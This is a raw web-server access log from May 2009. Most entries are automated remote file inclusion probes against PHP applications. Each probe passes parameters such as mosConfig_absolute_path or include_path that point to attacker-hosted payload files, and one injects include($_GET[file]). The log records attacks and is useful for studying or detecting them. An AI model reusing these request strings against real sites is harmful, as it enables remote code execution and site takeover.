216.151.134.36 - - [20/May/2009:09:00:17 -0700] "GET /logs/access_081118.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.151.134.36 - - [20/May/2009:09:00:17 -0700] "GET /logs/access_090215.log%20%20//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:00:32 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:00:32 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:00:32 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [20/May/2009:09:00:33 -0700] "GET /logs/access_080319.log//modules/SPChat/images/12.php?teste=http://www.graal-plus.zp.ua//images/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:00:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:00:34 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:00:34 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.219.99.129 - - [20/May/2009:09:00:40 -0700] "GET /logs/access_090315.log//guestbook1//admin.php?include_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [20/May/2009:09:00:41 -0700] "GET /guestbook1//admin.php?include_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [20/May/2009:09:00:41 -0700] "GET /logs//guestbook1//admin.php?include_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:00:45 -0700] "GET /logs/access_080411.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:00:45 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:00:45 -0700] "GET /logs/access_080411.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:00:49 -0700] "GET /logs/access_080906.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:09:00:55 -0700] "GET /logs/access_081109.log//modules/public/calendar.php?baseDir=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:09:00:56 -0700] "GET /modules/public/calendar.php?baseDir=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:09:00:56 -0700] "GET /logs//modules/public/calendar.php?baseDir=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.219.99.129 - - [20/May/2009:09:01:06 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:01:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:01:30 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:01:31 -0700] "GET /logs/access_080426.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:01:31 -0700] "GET /logs/access_080423.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:01:46 -0700] "GET /logs/access_080906.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:01:50 -0700] "GET /logs/access_080402.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:01:55 -0700] "GET /index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 200 41961 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:01:57 -0700] "GET /logs/access_080402.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:09:02:04 -0700] "GET /logs/access_081105.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://baliimports.com.au/images/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:09:02:04 -0700] "GET /logs/access_081105.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://baliimports.com.au/images/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:09:02:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://baliimports.com.au/images/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:09:02:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://baliimports.com.au/images/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:09:02:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://baliimports.com.au/images/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.111.100 - - [20/May/2009:09:02:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://baliimports.com.au/images/id.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:02:05 -0700] "GET /logs/access_080426.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:02:05 -0700] "GET /logs/access_080423.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:02:36 -0700] "GET /logs/access_080411.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:02:36 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:02:36 -0700] "GET /logs/access_080411.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:02:40 -0700] "GET /logs/access_080906.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:02:51 -0700] "GET /logs/access_081212.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:02:51 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:02:52 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:02:59 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:03:03 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:03:04 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:03:09 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:03:15 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:03:22 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:03:23 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:03:23 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:03:31 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:03:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:03:36 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:03:53 -0700] "GET /logs/access_080615.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:03:53 -0700] "GET /logs/access_080402.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:03:55 -0700] "GET /logs/access_080615.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:03:58 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:04:01 -0700] "GET /index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
195.70.36.69 - - [20/May/2009:09:04:10 -0700] "GET /logs/access_081201.log%20%20/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.70.36.69 - - [20/May/2009:09:04:10 -0700] "GET /logs/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 100346 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:04:15 -0700] "GET /logs/access_080906.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:19 -0700] "GET /logs/access_080416.log/components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:19 -0700] "GET /logs/components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:19 -0700] "GET /components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.70.36.69 - - [20/May/2009:09:04:20 -0700] "GET /logs/access_090215.log%20%20/////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:04:21 -0700] "GET /logs/access_080302.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:04:21 -0700] "GET /administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:04:22 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:25 -0700] "GET /logs/access_071226.log/components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:04:25 -0700] "GET /index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 41959 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.29.190 - - [20/May/2009:09:04:26 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:30 -0700] "GET /logs/components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:30 -0700] "GET /logs/access_080416.log/components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:31 -0700] "GET /components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:04:32 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.19.228.18 - - [20/May/2009:09:04:38 -0700] "GET /logs/access_071226.log/components/com_slideshow/admin.slideshow1.php%22=http://www.geocities.com/andrie_it/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:04:46 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:04:52 -0700] "GET /logs/access_080402.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:04:54 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:04:54 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:04:56 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:04:56 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:04:56 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:04:56 -0700] "GET /logs/access_080815.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:04:59 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:04:59 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:04:59 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:05:02 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:05:08 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:05:08 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:05:08 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:05:08 -0700] "GET /logs/access_081212.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:05:08 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:05:12 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:14 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.70.36.69 - - [20/May/2009:09:05:14 -0700] "GET ////////?cmd&file=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 42063 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:16 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:16 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:17 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:05:18 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:20 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:20 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:05:21 -0700] "GET /claroline/tracking/userLog.php?rootSys=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:05:21 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:05:21 -0700] "GET /logs/access_080524.log//claroline/tracking/userLog.php?rootSys=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:21 -0700] "GET /logs/access_090217.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:23 -0700] "GET /logs/access_090208.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:05:25 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:05:25 -0700] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [20/May/2009:09:05:25 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:05:27 -0700] "GET /logs/access_080620.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:05:32 -0700] "GET /logs/access_080412.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:09:05:32 -0700] "GET /logs/access_080815.log%20%20//index.php?option=com_custompages&cpage=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:05:32 -0700] "GET /logs/access_080106.log//claroline/tracking/userLog.php?rootSys=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.81.93.2 - - [20/May/2009:09:05:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
